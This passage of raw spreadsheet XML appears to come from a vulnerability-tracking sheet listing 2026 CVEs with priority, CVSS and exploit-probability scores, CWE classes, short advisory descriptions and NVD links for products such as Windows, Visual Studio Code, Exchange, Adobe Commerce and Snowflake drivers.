r="J310" s="5" t="inlineStr" /><c r="K310" s="5" t="inlineStr" /><c r="L310" s="5" t="inlineStr" /><c r="M310" s="5" t="inlineStr" /><c r="N310" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O310" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P310" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q310" s="5" t="inlineStr" /><c r="R310" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="S310" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to reverse engineer PIMBoards users’ app-native passwords through computational brute-forcing of weak hashes, potentially allowing elevation to a PIMBoards administrator user.</t></is></c><c r="T310" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81822</t></is></c></row><row r="311"><c r="A311" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B311" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C311" s="5" t="inlineStr"><is><t>CVE-2026-69846</t></is></c><c r="D311" s="5" t="n"><v>8.199999999999999</v></c><c r="E311" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F311" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G311" s="5" t="inlineStr" /><c r="H311" s="5" t="n"><v>0.003</v></c><c r="I311" s="5" t="inlineStr" /><c r="J311" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K31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11" s="5" t="inlineStr" /><c r="M311" s="5" t="inlineStr" /><c r="N311" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O311" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P311" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q311" s="5" t="inlineStr" /><c r="R311" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S311" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T311" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t></is></c></row><row r="312"><c r="A312" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B312" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C312" s="5" t="inlineStr"><is><t>CVE-2026-69906</t></is></c><c r="D312" s="5" t="n"><v>8.199999999999999</v></c><c r="E312" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F312" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G312" s="5" t="inlineStr" /><c r="H312" s="5" t="n"><v>0.003</v></c><c r="I312" s="5" t="inlineStr" /><c r="J312" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K31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12" s="5" t="inlineStr" /><c r="M312" s="5" t="inlineStr" /><c r="N312" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O312" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P312" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q312" s="5" t="inlineStr" /><c r="R312" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S312" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T312" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t></is></c></row><row r="313"><c r="A313" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B313" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C313" s="5" t="inlineStr"><is><t>CVE-2026-72958</t></is></c><c r="D313" s="5" t="n"><v>8.199999999999999</v></c><c r="E313" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F313" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G313" s="5" t="inlineStr" /><c r="H313" s="5" t="n"><v>0.003</v></c><c r="I313" s="5" t="inlineStr" /><c r="J313" s="5" t="inlineStr" /><c r="K313" s="5" t="inlineStr" /><c r="L313" s="5" t="inlineStr" /><c r="M313" s="5" t="inlineStr" /><c r="N313" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O313" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P313" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q313" s="5" t="inlineStr" /><c r="R313" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S313" s="5" t="inlineStr"><is><t>Double free in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T313" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72958</t></is></c></row><row r="314"><c r="A314" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B314" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C314" s="5" t="inlineStr"><is><t>CVE-2026-72961</t></is></c><c r="D314" s="5" t="n"><v>8.199999999999999</v></c><c r="E314" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F314" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G314" s="5" t="inlineStr" /><c r="H314" s="5" t="n"><v>0.003</v></c><c r="I314" s="5" t="inlineStr" /><c r="J314" s="5" t="inlineStr" /><c r="K314" s="5" t="inlineStr" /><c r="L314" s="5" t="inlineStr" /><c r="M314" s="5" t="inlineStr" /><c r="N314" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O314" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P314" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q314" s="5" t="inlineStr" /><c r="R314" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S314" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Hyper-V allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T314" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72961</t></is></c></row><row r="315"><c r="A315" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B315" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C315" s="5" t="inlineStr"><is><t>CVE-2026-72962</t></is></c><c r="D315" s="5" t="n"><v>8.199999999999999</v></c><c r="E315" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F315" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G315" s="5" t="inlineStr" /><c r="H315" s="5" t="n"><v>0.003</v></c><c r="I315" s="5" t="inlineStr" /><c r="J315" s="5" t="inlineStr" /><c r="K315" s="5" t="inlineStr" /><c r="L315" s="5" t="inlineStr" /><c r="M315" s="5" t="inlineStr" /><c r="N315" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O315" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P315" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q315" s="5" t="inlineStr" /><c r="R315" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S315" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T315" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72962</t></is></c></row><row r="316"><c r="A316" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B316" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C316" s="5" t="inlineStr"><is><t>CVE-2026-76191</t></is></c><c r="D316" s="5" t="n"><v>8.199999999999999</v></c><c r="E316" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F316" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G316" s="5" t="inlineStr" /><c r="H316" s="5" t="n"><v>0.003</v></c><c r="I316" s="5" t="inlineStr" /><c r="J316" s="5" t="inlineStr" /><c r="K316" s="5" t="inlineStr"><is><t>adobe:animate, apple:macos, microsoft:windows</t></is></c><c r="L316" s="5" t="inlineStr" /><c r="M316" s="5" t="inlineStr" /><c r="N316" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O316" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P316" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q316" s="5" t="inlineStr" /><c r="R316" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S316" s="5" t="inlineStr"><is><t>Animate is affected by an Improper Control of Generation of Code ('Code Injection')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is></c><c r="T316" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76191</t></is></c></row><row r="317"><c r="A317" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B317" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C317" s="5" t="inlineStr"><is><t>CVE-2026-76202</t></is></c><c r="D317" s="5" t="n"><v>8.199999999999999</v></c><c r="E317" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F317" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G317" s="5" t="inlineStr" /><c r="H317" s="5" t="n"><v>0.004</v></c><c r="I317" s="5" t="inlineStr" /><c r="J317" s="5" t="inlineStr" /><c r="K317" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L317" s="5" t="inlineStr" /><c r="M317" s="5" t="inlineStr" /><c r="N317" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O317" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P317" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q317" s="5" t="inlineStr" /><c r="R317" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S317" s="5" t="inlineStr"><is><t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to sensitive information. Exploitation of this issue does not require user interaction.</t></is></c><c r="T317" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76202</t></is></c></row><row r="318"><c r="A318" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B318" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C318" s="5" t="inlineStr"><is><t>CVE-2026-77097</t></is></c><c r="D318" s="5" t="n"><v>8.199999999999999</v></c><c r="E318" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G318" s="5" t="inlineStr" /><c r="H318" s="5" t="n"><v>0.003</v></c><c r="I318" s="5" t="inlineStr" /><c r="J318" s="5" t="inlineStr" /><c r="K318" s="5" t="inlineStr"><is><t>commvault:commvault</t></is></c><c r="L318" s="5" t="inlineStr" /><c r="M318" s="5" t="inlineStr" /><c r="N318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O318" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P318" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q318" s="5" t="inlineStr" /><c r="R318" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S318" s="5" t="inlineStr"><is><t>Private Metrics Server contained a missing authentication condition affecting metrics upload functionality and service availability. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t></is></c><c r="T318" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77097</t></is></c></row><row r="319"><c r="A319" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B319" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C319" s="5" t="inlineStr"><is><t>CVE-2026-77968</t></is></c><c r="D319" s="5" t="n"><v>8.199999999999999</v></c><c r="E319" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F319" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G319" s="5" t="inlineStr" /><c r="H319" s="5" t="n"><v>0.002</v></c><c r="I319" s="5" t="inlineStr" /><c r="J319" s="5" t="inlineStr" /><c r="K319" s="5" t="inlineStr" /><c r="L319" s="5" t="inlineStr" /><c r="M319" s="5" t="inlineStr" /><c r="N319" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O319" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P319" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q319" s="5" t="inlineStr" /><c r="R319" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S319" s="5" t="inlineStr"><is><t>A flaw was found in hawtio-operator. The operator's ClusterRole grants secrets: [create, get, list, update, watch] across all namespaces. While the operator uses a controller-runtime label-selector cache as a memory optimization, the ServiceAccount token authorizes read access to every Secret in the cluster. The operator also bypasses the cache via direct API calls. Compromise of the operator pod would yield read access to every Secret in the cluster, including bootstrap tokens, cloud credentials, and other operators' secrets.</t></is></c><c r="T319" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77968</t></is></c></row><row r="320"><c r="A320" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B320" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C320" s="5" t="inlineStr"><is><t>CVE-2026-81354</t></is></c><c r="D320" s="5" t="n"><v>8.199999999999999</v></c><c r="E320" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F320" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G320" s="5" t="inlineStr" /><c r="H320" s="5" t="n"><v>0.002</v></c><c r="I320" s="5" t="inlineStr" /><c r="J320" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K320" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t></is></c><c r="L320" s="5" t="inlineStr" /><c r="M320" s="5" t="inlineStr" /><c r="N320" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O320" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P320" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q320" s="5" t="inlineStr" /><c r="R320" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S320" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T320" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t></is></c></row><row r="321"><c r="A321" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B321" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C321" s="5" t="inlineStr"><is><t>CVE-2026-81356</t></is></c><c r="D321" s="5" t="n"><v>8.199999999999999</v></c><c r="E321" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F321" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G321" s="5" t="inlineStr" /><c r="H321" s="5" t="n"><v>0.003</v></c><c r="I321" s="5" t="inlineStr" /><c r="J321" s="5" t="inlineStr" /><c r="K321" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L321" s="5" t="inlineStr" /><c r="M321" s="5" t="inlineStr" /><c r="N321" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O321" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P321" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q321" s="5" t="inlineStr" /><c r="R321" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="S321" s="5" t="inlineStr"><is><t>Inconsistent interpretation of http requests ('http request/response smuggling') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T321" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81356</t></is></c></row><row r="322"><c r="A322" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B322" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C322" s="5" t="inlineStr"><is><t>CVE-2026-81357</t></is></c><c r="D322" s="5" t="n"><v>8.199999999999999</v></c><c r="E322" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F322" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G322" s="5" t="inlineStr" /><c r="H322" s="5" t="n"><v>0.003</v></c><c r="I322" s="5" t="inlineStr" /><c r="J322" s="5" t="inlineStr" /><c r="K322" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L322" s="5" t="inlineStr" /><c r="M322" s="5" t="inlineStr" /><c r="N322" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O322" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P322" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q322" s="5" t="inlineStr" /><c r="R322" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S322" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T322" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81357</t></is></c></row><row r="323"><c r="A323" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B323" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C323" s="5" t="inlineStr"><is><t>CVE-2026-81378</t></is></c><c r="D323" s="5" t="n"><v>8.199999999999999</v></c><c r="E323" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F323" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G323" s="5" t="inlineStr" /><c r="H323" s="5" t="n"><v>0.003</v></c><c r="I323" s="5" t="inlineStr" /><c r="J323" s="5" t="inlineStr" /><c r="K323" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L323" s="5" t="inlineStr" /><c r="M323" s="5" t="inlineStr" /><c r="N323" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O323" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P323" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q323" s="5" t="inlineStr" /><c r="R323" s="5" t="inlineStr"><is><t>CWE-436</t></is></c><c r="S323" s="5" t="inlineStr"><is><t>Interpretation conflict in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T323" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81378</t></is></c></row><row r="324"><c r="A324" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B324" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C324" s="5" t="inlineStr"><is><t>CVE-2026-81379</t></is></c><c r="D324" s="5" t="n"><v>8.199999999999999</v></c><c r="E324" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F324" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G324" s="5" t="inlineStr" /><c r="H324" s="5" t="n"><v>0.003</v></c><c r="I324" s="5" t="inlineStr" /><c r="J324" s="5" t="inlineStr" /><c r="K324" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L324" s="5" t="inlineStr" /><c r="M324" s="5" t="inlineStr" /><c r="N324" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O324" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P324" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q324" s="5" t="inlineStr" /><c r="R324" s="5" t="inlineStr"><is><t>CWE-636</t></is></c><c r="S324" s="5" t="inlineStr"><is><t>Not failing securely ('failing open') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T324" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81379</t></is></c></row><row r="325"><c r="A325" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B325" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C325" s="5" t="inlineStr"><is><t>CVE-2026-83939</t></is></c><c r="D325" s="5" t="n"><v>8.199999999999999</v></c><c r="E325" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F325" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G325" s="5" t="inlineStr" /><c r="H325" s="5" t="n"><v>0.003</v></c><c r="I325" s="5" t="inlineStr" /><c r="J325" s="5" t="inlineStr" /><c r="K325" s="5" t="inlineStr"><is><t>microsoft:windows_11_26h1</t></is></c><c r="L325" s="5" t="inlineStr" /><c r="M325" s="5" t="inlineStr" /><c r="N325" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O325" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P325" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q325" s="5" t="inlineStr" /><c r="R325" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S325" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T325" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83939</t></is></c></row><row r="326"><c r="A326" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B326" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C326" s="5" t="inlineStr"><is><t>CVE-2026-86600</t></is></c><c r="D326" s="5" t="n"><v>8.199999999999999</v></c><c r="E326" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F326" s="5" t="inlineStr"><is><t>412d305a-227d-44f9-a262-a31ba44f2aea</t></is></c><c r="G326" s="5" t="inlineStr" /><c r="H326" s="5" t="n"><v>0.003</v></c><c r="I326" s="5" t="inlineStr" /><c r="J326" s="5" t="inlineStr" /><c r="K326" s="5" t="inlineStr" /><c r="L326" s="5" t="inlineStr" /><c r="M326" s="5" t="inlineStr" /><c r="N326" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O326" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P326" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q326" s="5" t="inlineStr" /><c r="R326" s="5" t="inlineStr"><is><t>CWE-441, CWE-522</t></is></c><c r="S326" s="5" t="inlineStr"><is><t>In affected Snowflake drivers, WORKLOAD_IDENTITY authentication requests a cloud workload-identity token and attaches it to the login request without verifying that the configured host is a Snowflake endpoint. An attacker who can modify the connection configuration can cause the driver to mint a fresh attestation and send it to a host they control. The captured token can be replayed to Snowflake for its remaining lifetime in accounts where that workload identity is already registered. On Azure, the token audience is also taken from connection configuration. Combined with an attacker-controlled host, the driver can request a Managed Identity access token scoped to a non-Snowflake Azure resource and deliver it to the attacker. That path is the only case in which impact extends beyond Snowflake; it is bounded by the token lifetime and the managed identity’s permissions. Successful exploitation requires WORKLOAD_IDENTITY authentication on a workload that already has an ambient cloud identity. Patched driver versions restrict this authenticator to recognized Snowflake hosts. Users must manually upgrade.</t></is></c><c r="T326" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86600</t></is></c></row><row r="327"><c r="A327" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B327" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C327" s="5" t="inlineStr"><is><t>CVE-2026-47297</t></is></c><c r="D327" s="5" t="n"><v>8.1</v></c><c r="E327" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F327" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G327" s="5" t="inlineStr" /><c r="H327" s="5" t="n"><v>0.008</v></c><c r="I327" s="5" t="inlineStr" /><c r="J327" s="5" t="inlineStr" /><c r="K327" s="5" t="inlineStr" /><c r="L327" s="5" t="inlineStr" /><c r="M327" s="5" t="inlineStr" /><c r="N327" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O327" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P327" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q327" s="5" t="inlineStr" /><c r="R327" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S327" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T327" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47297</t></is></c></row><row r="328"><c r="A328" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B328" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C328" s="5" t="inlineStr"><is><t>CVE-2026-55007</t></is></c><c r="D328" s="5" t="n"><v>8.1</v></c><c r="E328" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F328" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G328" s="5" t="inlineStr" /><c r="H328" s="5" t="n"><v>0.007</v></c><c r="I328" s="5" t="inlineStr" /><c r="J328" s="5" t="inlineStr" /><c r="K328" s="5" t="inlineStr" /><c r="L328" s="5" t="inlineStr" /><c r="M328" s="5" t="inlineStr" /><c r="N328" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O328" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P328" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q328" s="5" t="inlineStr" /><c r="R328" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S328" s="5" t="inlineStr"><is><t>Double free in Microsoft Exchange Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T328" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55007</t></is></c></row><row r="329"><c r="A329" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B329" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C329" s="5" t="inlineStr"><is><t>CVE-2026-69325</t></is></c><c r="D329" s="5" t="n"><v>8.1</v></c><c r="E329" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F329" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G329" s="5" t="inlineStr" /><c r="H329" s="5" t="n"><v>0.006</v></c><c r="I329" s="5" t="inlineStr" /><c r="J329" s="5" t="inlineStr" /><c r="K329" s="5" t="inlineStr" /><c r="L329" s="5" t="inlineStr" /><c r="M329" s="5" t="inlineStr" /><c r="N329" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O329" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P329" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q329" s="5" t="inlineStr" /><c r="R329" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S329" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T329" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69325</t></is></c></row><row r="330"><c r="A330" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B330" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C330" s="5" t="inlineStr"><is><t>CVE-2026-69380</t></is></c><c r="D330" s="5" t="n"><v>8.1</v></c><c r="E330" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F330" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G330" s="5" t="inlineStr" /><c r="H330" s="5" t="n"><v>0.007</v></c><c r="I330" s="5" t="inlineStr" /><c r="J330" s="5" t="inlineStr" /><c r="K330" s="5" t="inlineStr" /><c r="L330" s="5" t="inlineStr" /><c r="M330" s="5" t="inlineStr" /><c r="N330" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O330" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P330" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q330" s="5" t="inlineStr" /><c r="R330" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S330" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T330" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69380</t></is></c></row><row r="331"><c r="A331" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B331" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C331" s="5" t="inlineStr"><is><t>CVE-2026-69438</t></is></c><c r="D331" s="5" t="n"><v>8.1</v></c><c r="E331" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F331" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G331" s="5" t="inlineStr" /><c r="H331" s="5" t="n"><v>0.007</v></c><c r="I331" s="5" t="inlineStr" /><c r="J331" s="5" t="inlineStr" /><c r="K331" s="5" t="inlineStr" /><c r="L331" s="5" t="inlineStr" /><c r="M331" s="5" t="inlineStr" /><c r="N331" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O331" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P331" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q331" s="5" t="inlineStr" /><c r="R331" s="5" t="inlineStr"><is><t>CWE-681</t></is></c><c r="S331" s="5" t="inlineStr"><is><t>Incorrect conversion between numeric types in Microsoft JScript allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T331" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69438</t></is></c></row><row r="332"><c r="A332" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B332" s="5" 